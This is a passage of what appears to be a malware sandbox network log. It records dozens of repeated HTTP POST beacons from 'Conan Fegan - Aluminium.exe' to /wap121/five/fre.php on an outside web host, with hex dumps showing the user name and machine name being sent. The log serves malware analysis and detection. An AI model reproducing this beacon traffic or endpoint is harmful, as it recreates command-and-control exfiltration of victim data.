                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:06.153937101 CET6200OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:06.530955076 CET6201INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          49192.168.2.449818203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:07.112781048 CET6201OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:07.451307058 CET6202OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:07.826639891 CET6202INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.449752203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:09.379899025 CET1540OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:09.717972994 CET1541OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:10.094573975 CET1541INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          50192.168.2.449819203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:08.413652897 CET6203OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:08.749602079 CET6203OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:09.114203930 CET6204INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          51192.168.2.449820203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:09.712193966 CET6204OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:10.049978971 CET6205OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:10.421947002 CET6205INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          52192.168.2.449821203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:11.002002954 CET6206OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:11.337898016 CET6206OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:11.707024097 CET6207INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          53192.168.2.449822203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:12.313270092 CET6207OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:12.653307915 CET6208OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:13.023763895 CET6208INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          54192.168.2.449823203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:13.908883095 CET6209OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:14.247961044 CET6209OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:14.616005898 CET6209INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          55192.168.2.449824203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:15.437535048 CET6210OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:15.773653984 CET6211OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:16.140294075 CET6211INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          56192.168.2.449825203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:16.710648060 CET6212OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:17.048197985 CET6212OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:17.424968958 CET6212INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          57192.168.2.449826203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:18.024683952 CET6213OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:18.362878084 CET6214OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:18.739638090 CET6214INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          58192.168.2.449827203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:19.321867943 CET6215OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:19.660252094 CET6215OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:20.031702995 CET6215INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          59192.168.2.449828203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:20.599287033 CET6216OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:20.937680960 CET6217OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:21.306483984 CET6217INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.449753203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:10.753897905 CET1542OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:11.089572906 CET1542OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:11.455200911 CET1542INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          60192.168.2.449829203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:21.882520914 CET6218OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:22.227998972 CET6218OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:22.606409073 CET6218INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          61192.168.2.449830203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:23.176364899 CET6219OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:23.515377998 CET6220OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:23.883021116 CET6220INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          62192.168.2.449831203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:24.482439995 CET6221OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:24.822552919 CET6221OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:25.190963030 CET6221INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          63192.168.2.449832203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:25.733887911 CET6222OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:26.068434000 CET6222OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:26.446412086 CET6223INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          64192.168.2.449833203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:27.016300917 CET6224OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:27.351428986 CET6224OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:27.717015982 CET6224INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          65192.168.2.449834203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:28.298521042 CET6225OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:28.636457920 CET6225OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
